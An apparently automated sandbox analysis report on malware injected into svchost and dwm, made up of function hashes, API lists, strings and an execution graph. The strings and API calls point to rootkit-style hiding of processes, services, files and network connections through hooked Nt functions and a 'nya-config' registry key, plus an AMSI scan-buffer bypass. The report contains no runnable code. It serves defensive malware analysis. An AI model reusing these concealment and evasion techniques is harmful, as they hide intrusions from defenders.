                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: eb72844637493c4f102b5757175871491ca948ddf3b39f32b9f3a56f7479e12c
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: FE61C236904BC491DBB0AF55E544B9AB7B0F795BC9F144235EB9807B96EBBCC091CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: dff5c28ae23f6fb28725aba5b6bbbfb6d753e5a829e45e780184bca63f5c3eae
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 5451E62AE0878061FEACAEA5E66C3AB7775F394740F040835CF4943B6ADABDD400CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 27cf9f434496b3bd170b431ba0fea5b332a09b693fd3e9a843dce89e3fca500e
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 61411636A25A80A6EB90EFA5E55879BB7B0F34C784F401032EF4D87759EBB8C441CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 7368844f5f46a0da056b2b14b5b0993db77552c27402f613873d14bbf342e81d
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 08117936A04B8092EBA49F15F51824AB7E1F798B84F188634EF8D07B66DF7CC551CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: d2d243e1f4da33dff666983cb4b4fc9292e00df8db3f46f6f3574d3ee2618496
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 7B115A29A01B9091EA94EFA6E52815A67B0E78CFC0F589034DF4A57726DEB8D452C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: e58150afabff5c1ea00ebf14978d6c6d839fdce1e2f42293329f13860d5d1706
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 4DE0ED75A11604AAE798AFA2D92825A76B1FB8CB15F44D034CA0907311EEB88899D710

                                            Execution Graph

                                            Execution Coverage:1.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:111
                                            Total number of Limit Nodes:17
                                            execution_graph 22410 262f1c95c8d 22412 262f1c95c94 22410->22412 22411 262f1c95cfb 22412->22411 22413 262f1c95d77 VirtualProtect 22412->22413 22414 262f1c95db1 22413->22414 22415 262f1c95da3 GetLastError 22413->22415 22415->22414 22416 262f1c91e3c LoadLibraryA GetProcAddress 22417 262f1c91e6f 22416->22417 22418 262f1c91e62 SleepEx 22416->22418 22418->22418 22419 262f1c9f370 VirtualProtect 22420 262f1c96430 22421 262f1c9643d 22420->22421 22422 262f1c96449 22421->22422 22428 262f1c9655a 22421->22428 22423 262f1c9647e 22422->22423 22424 262f1c964cd 22422->22424 22425 262f1c964a6 SetThreadContext 22423->22425 22425->22424 22426 262f1c9663e 22429 262f1c9665e 22426->22429 22438 262f1c94b20 VirtualFree 22426->22438 22427 262f1c96581 VirtualProtect FlushInstructionCache 22427->22428 22428->22426 22428->22427 22439 262f1c95530 GetCurrentProcess 22429->22439 22432 262f1c96663 22433 262f1c966b7 22432->22433 22434 262f1c96677 ResumeThread 22432->22434 22443 262f1c98070 8 API calls 2 library calls 22433->22443 22435 262f1c966ab 22434->22435 22435->22432 22437 262f1c966ff 22438->22429 22440 262f1c9554c 22439->22440 22441 262f1c95593 22440->22441 22442 262f1c95562 VirtualProtect FlushInstructionCache 22440->22442 22441->22432 22442->22440 22443->22437 22444 262f1c92c80 TlsGetValue TlsGetValue TlsGetValue 22445 262f1c92d51 NtEnumerateValueKey 22444->22445 22446 262f1c92cd9 22444->22446 22447 262f1c92d4c 22445->22447 22454 262f1c92d86 22445->22454 22446->22445 22451 262f1c92ce1 22446->22451 22448 262f1c92d2d NtEnumerateValueKey 22448->22447 22448->22451 22449 262f1c92da0 NtEnumerateValueKey 22449->22454 22450 262f1c92e06 TlsSetValue TlsSetValue TlsSetValue 22450->22447 22451->22447 22451->22448 22451->22450 22455 262f1c93f88 22451->22455 22453 262f1c93f88 StrCmpNIW 22453->22454 22454->22447 22454->22449 22454->22450 22454->22453 22456 262f1c93faa 22455->22456 22457 262f1c93f95 StrCmpNIW 22455->22457 22456->22451 22457->22456 22458 262f1c91bc4 22465 262f1c91724 GetProcessHeap HeapAlloc 22458->22465 22460 262f1c91bd3 22461 262f1c91bda SleepEx 22460->22461 22464 262f1c9159c StrCmpIW StrCmpW 22460->22464 22516 262f1c919b0 12 API calls 22460->22516 22462 262f1c91724 50 API calls 22461->22462 22462->22460 22464->22460 22517 262f1c91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22465->22517 22467 262f1c9174c 22518 262f1c91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22467->22518 22469 262f1c91754 22519 262f1c91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22469->22519 22471 262f1c9175d 22520 262f1c91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22471->22520 22473 262f1c91766 22521 262f1c91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22473->22521 22475 262f1c9176f 22522 262f1c91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22475->22522 22477 262f1c91778 22523 262f1c91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22477->22523 22479 262f1c91781 22524 262f1c91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22479->22524 22481 262f1c9178a RegOpenKeyExW 22482 262f1c917bc RegOpenKeyExW 22481->22482 22483 262f1c919a2 22481->22483 22484 262f1c917fb RegOpenKeyExW 22482->22484 22485 262f1c917e5 22482->22485 22483->22460 22487 262f1c9181f 22484->22487 22488 262f1c91836 RegOpenKeyExW 22484->22488 22531 262f1c912b8 16 API calls 22485->22531 22525 262f1c9104c RegQueryInfoKeyW 22487->22525 22491 262f1c9185a 22488->22491 22492 262f1c91871 RegOpenKeyExW 22488->22492 22489 262f1c917f1 RegCloseKey 22489->22484 22532 262f1c912b8 16 API calls 22491->22532 22495 262f1c918ac RegOpenKeyExW 22492->22495 22496 262f1c91895 22492->22496 22498 262f1c918d0 22495->22498 22499 262f1c918e7 RegOpenKeyExW 22495->22499 22533 262f1c912b8 16 API calls 22496->22533 22534 262f1c912b8 16 API calls 22498->22534 22503 262f1c9190b 22499->22503 22504 262f1c91922 RegOpenKeyExW 22499->22504 22500 262f1c91867 RegCloseKey 22500->22492 22501 262f1c918a2 RegCloseKey 22501->22495 22506 262f1c9104c 6 API calls 22503->22506 22507 262f1c9195d RegOpenKeyExW 22504->22507 22508 262f1c91946 22504->22508 22505 262f1c918dd RegCloseKey 22505->22499 22509 262f1c91918 RegCloseKey 22506->22509 22511 262f1c91981 22507->22511 22512 262f1c91998 RegCloseKey 22507->22512 22510 262f1c9104c 6 API calls 22508->22510 22509->22504 22514 262f1c91953 RegCloseKey 22510->22514 22513 262f1c9104c 6 API calls 22511->22513 22512->22483 22515 262f1c9198e RegCloseKey 22513->22515 22514->22507 22515->22512 22517->22467 22518->22469 22519->22471 22520->22473 22521->22475 22522->22477 22523->22479 22524->22481 22526 262f1c910bf 22525->22526 22527 262f1c911b5 RegCloseKey 22525->22527 22526->22527 22528 262f1c910cf RegEnumValueW 22526->22528 22527->22488 22529 262f1c91125 22528->22529 22529->22527 22529->22528 22530 262f1c9114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22529->22530 22530->22529 22531->22489 22532->22500 22533->22501 22534->22505 22535 262f1c941f9 22540 262f1c94146 _invalid_parameter_noinfo 22535->22540 22536 262f1c94196 VirtualQuery 22539 262f1c941b0 22536->22539 22536->22540 22537 262f1c941ca VirtualAlloc 22538 262f1c941fb GetLastError 22537->22538 22537->22539 22538->22540 22540->22536 22540->22537 22540->22539

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Value$Enumerate
                                            • String ID:
                                            • API String ID: 3520290360-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 3cde0a9a3dbcaa3e8b6a5bb1a9bfd7b4507eb1456a8fe0009fb906c1fcea421b
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 90518136214A61C7E365CB15A46C75AB7B0F788B84FD04139DE8A43FD8DB3AC949CB02

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: b66a87bf2abe2e6163f6f1e523dcfaff00ca37a94c1888edbb47774e79d68267
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 21711736310E60C5EB119F62E86D79927B4FB85F98FC05121DA4E47FA8DE36C448C741

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 0b42d8ed8c7acc2e221219a9bc6ed5a4b99f96483b638c3f5803d7d084d0dba7
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 9E519AB0510E6AE5FB02EBA4EC6C7D42B30A740B98FC04537954942DE9DE3A825EC387

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 5b6f95975762b6659832d5e0f0759809e8599dee62c6ca146bec9c7d5dcf177c
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 0151C431700F64D1EA199B56A82C3A92B70BB49BB0FD847359E3D47BD4DF3AD4098742

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 151 262f1c96270-262f1c96297 152 262f1c962ab-262f1c962b6 GetCurrentThreadId 151->152 153 262f1c96299-262f1c962a8 151->153 154 262f1c962c2-262f1c962c9 152->154 155 262f1c962b8-262f1c962bd 152->155 153->152 157 262f1c962db-262f1c962ef 154->157 158 262f1c962cb-262f1c962d6 call 262f1c960a0 154->158 156 262f1c966ef-262f1c96706 call 262f1c98070 155->156 159 262f1c962fe-262f1c96304 157->159 158->156 162 262f1c9630a-262f1c96313 159->162 163 262f1c963d5-262f1c963f6 159->163 166 262f1c9635a-262f1c963cd call 262f1c94c50 call 262f1c94bf0 call 262f1c94bb0 162->166 167 262f1c96315-262f1c96358 call 262f1ca3a40 162->167 171 262f1c963fc-262f1c9641c GetThreadContext 163->171 172 262f1c9655f-262f1c96570 call 262f1c97bff 163->172 179 262f1c963d0 166->179 167->179 176 262f1c9655a 171->176 177 262f1c96422-262f1c96443 171->177 182 262f1c96575-262f1c9657b 172->182 176->172 177->176 185 262f1c96449-262f1c96452 177->185 179->159 186 262f1c9663e-262f1c9664e 182->186 187 262f1c96581-262f1c965d8 VirtualProtect FlushInstructionCache 182->187 189 262f1c964d2-262f1c964e3 185->189 190 262f1c96454-262f1c96465 185->190 198 262f1c9665e-262f1c9666a call 262f1c95530 186->198 199 262f1c96650-262f1c96657 186->199 193 262f1c965da-262f1c965e4 187->193 194 262f1c96609-262f1c96639 call 262f1c97fdc 187->194 195 262f1c96555 189->195 196 262f1c964e5-262f1c96503 189->196 191 262f1c964cd 190->191 192 262f1c96467-262f1c9647c 190->192 191->195 192->191 200 262f1c9647e-262f1c964c8 call 262f1c940b0 SetThreadContext 192->200 193->194 202 262f1c965e6-262f1c96601 call 262f1c94ad0 193->202 194->182 196->195 204 262f1c96505-262f1c9654c call 262f1c94040 196->204 213 262f1c9666f-262f1c96675 198->213 199->198 205 262f1c96659 call 262f1c94b20 199->205 200->191 202->194 204->195 218 262f1c96550 call 262f1c97c1d 204->218 205->198 216 262f1c966b7-262f1c966d5 213->216 217 262f1c96677-262f1c966b5 ResumeThread call 262f1c97fdc 213->217 220 262f1c966d7-262f1c966e6 216->220 221 262f1c966e9 216->221 217->213 218->195 220->221 221->156
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                            • Instruction ID: c1c2ec9b84daf45c34f4e86823dcf7442cccecd9bf3cfca93e1928349ca1aafe
                                            • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                            • Instruction Fuzzy Hash: 42D17E76205FA8C1DA70DB16E4A835A7BB0F388B88F910126DACD47BE9DF39C555CB01

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 223 262f1c91e3c-262f1c91e60 LoadLibraryA GetProcAddress 224 262f1c91e6f-262f1c91e73 223->224 225 262f1c91e62-262f1c91e6d SleepEx 223->225 225->225
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: d6eef7045076ac9cf124b26653fba54614d86aa3dc1f6a9fdf0b9f54d317be12
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 93D06734651E20E5FA0A6B11E87D3653271BB65F41FC44435C60A01AE4DE2E895DD742

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 226 262f1c95810-262f1c9583c 227 262f1c9584d-262f1c95856 226->227 228 262f1c9583e-262f1c95846 226->228 229 262f1c95867-262f1c95870 227->229 230 262f1c95858-262f1c95860 227->230 228->227 231 262f1c95881-262f1c9588a 229->231 232 262f1c95872-262f1c9587a 229->232 230->229 233 262f1c9588c-262f1c95891 231->233 234 262f1c95896-262f1c958a1 GetCurrentThreadId 231->234 232->231 235 262f1c95e13-262f1c95e1a 233->235 236 262f1c958ad-262f1c958b4 234->236 237 262f1c958a3-262f1c958a8 234->237 238 262f1c958c1-262f1c958ca 236->238 239 262f1c958b6-262f1c958bc 236->239 237->235 240 262f1c958cc-262f1c958d1 238->240 241 262f1c958d6-262f1c958e2 238->241 239->235 240->235 242 262f1c9590e-262f1c95965 call 262f1c95e20 * 2 241->242 243 262f1c958e4-262f1c95909 241->243 248 262f1c9597a-262f1c95983 242->248 249 262f1c95967-262f1c9596e 242->249 243->235 252 262f1c95995-262f1c9599e 248->252 253 262f1c95985-262f1c95992 248->253 250 262f1c95970 249->250 251 262f1c95976 249->251 254 262f1c959f0-262f1c959f6 250->254 255 262f1c959e6-262f1c959ea 251->255 256 262f1c959a0-262f1c959b0 252->256 257 262f1c959b3-262f1c959d8 call 262f1c97fa0 252->257 253->252 258 262f1c95a25-262f1c95a2b 254->258 259 262f1c959f8-262f1c95a14 call 262f1c94ad0 254->259 255->254 256->257 265 262f1c95a6d-262f1c95a82 call 262f1c94400 257->265 266 262f1c959de 257->266 262 262f1c95a2d-262f1c95a4c call 262f1c97fdc 258->262 263 262f1c95a55-262f1c95a68 258->263 259->258 269 262f1c95a16-262f1c95a1e 259->269 262->263 263->235 273 262f1c95a91-262f1c95a9a 265->273 274 262f1c95a84-262f1c95a8c 265->274 266->255 269->258 275 262f1c95aac-262f1c95afa call 262f1ca40e0 273->275 276 262f1c95a9c-262f1c95aa9 273->276 274->255 279 262f1c95b02-262f1c95b0a 275->279 276->275 280 262f1c95b10-262f1c95bfb call 262f1c97b80 279->280 281 262f1c95c17-262f1c95c1f 279->281 293 262f1c95bfd 280->293 294 262f1c95bff-262f1c95c0e call 262f1c947a0 280->294 282 262f1c95c21-262f1c95c34 call 262f1c94cd0 281->282 283 262f1c95c63-262f1c95c6b 281->283 295 262f1c95c36 282->295 296 262f1c95c38-262f1c95c61 282->296 286 262f1c95c6d-262f1c95c75 283->286 287 262f1c95c77-262f1c95c86 283->287 286->287 290 262f1c95c94-262f1c95ca1 286->290 291 262f1c95c8f 287->291 292 262f1c95c88 287->292 298 262f1c95ca3 290->298 299 262f1c95ca4-262f1c95cf9 call 262f1ca3a40 290->299 291->290 292->291 293->281 303 262f1c95c10 294->303 304 262f1c95c12 294->304 295->283 296->281 298->299 305 262f1c95cfb-262f1c95d03 299->305 306 262f1c95d08-262f1c95da1 call 262f1c94c50 call 262f1c94bb0 VirtualProtect 299->306 303->281 304->279 311 262f1c95db1-262f1c95e11 306->311 312 262f1c95da3-262f1c95da8 GetLastError 306->312 311->235 312->311
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true
                                            • Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
